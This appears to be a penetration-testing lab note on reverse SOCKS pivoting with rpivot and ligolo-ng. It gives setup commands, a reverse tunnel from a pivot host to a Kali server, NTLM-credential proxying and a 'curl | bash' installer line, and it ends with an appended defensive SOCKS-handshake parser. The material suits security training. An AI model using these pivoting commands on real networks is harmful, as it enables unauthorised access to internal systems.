# Introduction

- `rpivot` is a reverse SOCKS proxy tool written in Python for SOCKS tunneling
- Essentially `rpivot` binds a machine inside an internal network to an external server and exposes the client's local port on the server side

![[images/Pasted image 20251022193913.png]]

# Using `rpivot`

- Installing `rpivot`

```bash
git clone https://github.com/klsecservices/rpivot.git
```

- Install `python2.7`

```bash
sudo apt install -y python2.7
```

- Alternative install for `python2.7`

```bash
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7
pyenv shell 2.7
```

- Move `rpivot` to the pivot host and run `client.py` on the pivot host

```bash
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/
cd rpivot
python2.7 client.py --server-ip <kali_host_ip> --server-port 9999
```

- Run `server.py` on the Kali host

```bash
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
```

- Confirm the connection between the Kali and pivot hosts

![[images/Pasted image 20251022194610.png]]

- Browse to the downstream target webserver using `proxychains4`

```bash
proxychains4 firefox-esr <internal_ip_target_webserver>
```

- Connect to the downstream target webserver using an HTTP proxy with NTLM authentication

```bash
python client.py --server-ip <internal_ip_target_webserver> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
```

# Exercise

## Attempt A

- Ping pivot host

![[images/Pasted image 20251022195148.png]]

- Light nmap scan of pivot host

![[images/Pasted image 20251022195155.png]]

- Download `rpivot`

![[images/Pasted image 20251022195229.png]]

- Move `rpivot` to pivot host with `scp`

![[images/Pasted image 20251022200027.png]]
![[images/Pasted image 20251022200045.png]]

- Execute `client.py` on pivot host

![[images/Pasted image 20251022201336.png]]

- Execute `server.py` on Kali host

![[images/Pasted image 20251022200208.png]]

- Nmap scan webserver ports on downstream webserver target

![[images/Pasted image 20251022200355.png]]

- Attempt to open page hosted by downstream webserver with `firefox-esr` browser

![[images/Pasted image 20251022201403.png]]

- Lots of errors, cannot see the page in the browser

## Attempt B

- Let's try with `ligolo-ng`
- Set up proxy on Kali host

![[images/Pasted image 20251022202001.png]]

- Move agent to pivot host

![[images/Pasted image 20251022202022.png]]
![[images/Pasted image 20251022202036.png]]

- Set up agent on pivot host

![[images/Pasted image 20251022202058.png]]

- Attach to session and set up autoroute on proxy

![[images/Pasted image 20251022202129.png]]

- Confirm `ligolo-ng` interface and route

![[images/Pasted image 20251022202204.png]]

- Confirm we can hit downstream webserver with `nmap` scan and `ping`

![[images/Pasted image 20251022202223.png]]

- Attempt to open page hosted by downstream webserver with `firefox-esr` browser

![[images/Pasted image 20251022202447.png]]
![[images/Pasted image 20251022202343.png]]

- That works!
- Thanks `ligolo-ng`
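The "Using `rpivot`" section above hands `proxychains4` a SOCKS listener on port 9050 and relies on `server.py` to relay whatever the client asks for. To make that relationship concrete, here is an added example (my own code, not part of this note or of the `rpivot` project) that decodes the first message a SOCKS client sends: a SOCKS4/4a CONNECT or a SOCKS5 greeting/CONNECT as defined by the SOCKS4 spec and RFC 1928. The page does not say which SOCKS version `rpivot` speaks, so the parser accepts both; the sample messages are constructed, and the `find_socks_connects` helper is hypothetical, showing how a defender reading a capture of the proxy port would list the destinations being tunneled.

```python
"""Decode SOCKS4/4a and SOCKS5 client messages (added example, not rpivot code)."""
import ipaddress
import struct

SOCKS_CMD = {1: "CONNECT", 2: "BIND", 3: "UDP_ASSOCIATE"}
SOCKS5_ATYP = {1: "ipv4", 3: "domain", 4: "ipv6"}
SOCKS5_METHODS = {0: "no-auth", 1: "gssapi", 2: "username/password"}


def _parse_socks4(data: bytes) -> dict:
    # VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID... NUL [SOCKS4a: HOSTNAME... NUL]
    if len(data) < 9:
        raise ValueError("truncated SOCKS4 request")
    cmd, port = struct.unpack("!BH", data[1:4])
    ip = ipaddress.IPv4Address(data[4:8])
    rest = data[8:]
    nul = rest.find(b"\x00")
    if nul < 0:
        raise ValueError("SOCKS4 USERID not NUL-terminated")
    userid = rest[:nul].decode("ascii", "replace")
    dest = str(ip)
    # SOCKS4a: DSTIP of 0.0.0.x (x != 0) means a hostname follows the USERID
    if ip in ipaddress.ip_network("0.0.0.0/24") and ip != ipaddress.IPv4Address("0.0.0.0"):
        tail = rest[nul + 1:]
        nul2 = tail.find(b"\x00")
        if nul2 < 0:
            raise ValueError("SOCKS4a hostname not NUL-terminated")
        dest = tail[:nul2].decode("ascii", "replace")
    return {"version": 4, "type": "request", "command": SOCKS_CMD.get(cmd, "UNKNOWN(%d)" % cmd),
            "dest": dest, "port": port, "userid": userid}


def _parse_socks5_request(data: bytes) -> dict:
    # VER(1) CMD(1) RSV(1) ATYP(1) DST.ADDR(var) DST.PORT(2)
    if len(data) < 5:
        raise ValueError("truncated SOCKS5 request")
    cmd, rsv, atyp = data[1], data[2], data[3]
    if rsv != 0:
        raise ValueError("SOCKS5 RSV must be 0")
    if atyp == 1:
        dest, off = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == 3:
        n = data[4]
        dest, off = data[5:5 + n].decode("ascii", "replace"), 5 + n
    elif atyp == 4:
        dest, off = str(ipaddress.IPv6Address(data[4:20])), 20
    else:
        raise ValueError("unknown ATYP %d" % atyp)
    if len(data) < off + 2:
        raise ValueError("truncated SOCKS5 request")
    (port,) = struct.unpack("!H", data[off:off + 2])
    return {"version": 5, "type": "request", "command": SOCKS_CMD.get(cmd, "UNKNOWN(%d)" % cmd),
            "dest": dest, "port": port, "atyp": SOCKS5_ATYP[atyp]}


def parse_socks_message(data: bytes) -> dict:
    """Classify one client-to-proxy message; raises ValueError if it is not SOCKS."""
    if not data:
        raise ValueError("empty message")
    ver = data[0]
    if ver == 4:
        return _parse_socks4(data)
    if ver == 5:
        # A greeting and a request both start with 0x05; a request has RSV=0 and a valid ATYP.
        if len(data) >= 4 and data[2] == 0 and data[3] in SOCKS5_ATYP and data[1] in SOCKS_CMD:
            try:
                return _parse_socks5_request(data)
            except ValueError:
                pass  # too short for a request; fall through to the greeting shape
        if len(data) >= 2 and len(data) == 2 + data[1]:
            methods = [SOCKS5_METHODS.get(m, "unknown(%d)" % m) for m in data[2:]]
            return {"version": 5, "type": "greeting", "methods": methods}
        raise ValueError("unrecognised SOCKS5 message")
    raise ValueError("not a SOCKS message (version byte %d)" % ver)


def find_socks_connects(payloads):
    """Hypothetical triage helper: (index, dest, port) for every SOCKS CONNECT seen."""
    hits = []
    for i, payload in enumerate(payloads):
        try:
            msg = parse_socks_message(payload)
        except ValueError:
            continue  # plain HTTP, TLS, or junk: not a SOCKS handshake
        if msg["type"] == "request" and msg["command"] == "CONNECT":
            hits.append((i, msg["dest"], msg["port"]))
    return hits


# Constructed first-packets as proxychains-style clients would send them to port 9050.
SAMPLE_PAYLOADS = [
    b"\x04\x01\x00\x50\x0a\x0a\x0a\x05kali\x00",                  # SOCKS4 CONNECT 10.10.10.5:80
    b"\x04\x01\x00\x50\x00\x00\x00\x01\x00intranet.example\x00",    # SOCKS4a CONNECT by hostname
    b"\x05\x01\x00",                                                # SOCKS5 greeting, no-auth
    b"\x05\x01\x00\x03\x10intranet.example\x1f\x90",                # SOCKS5 CONNECT domain:8080
    b"GET / HTTP/1.1\r\n\r\n",                                      # not SOCKS at all
]

if __name__ == "__main__":
    for idx, dest, port in find_socks_connects(SAMPLE_PAYLOADS):
        print("packet %d: CONNECT %s:%d" % (idx, dest, port))
```

Running the block prints one line per tunneled destination; the greeting (packet 2) and the raw HTTP request (packet 4) are ignored because neither is a CONNECT. The same routine works on the client side of any SOCKS relay, whether the listener is `rpivot`'s `server.py` or another proxy.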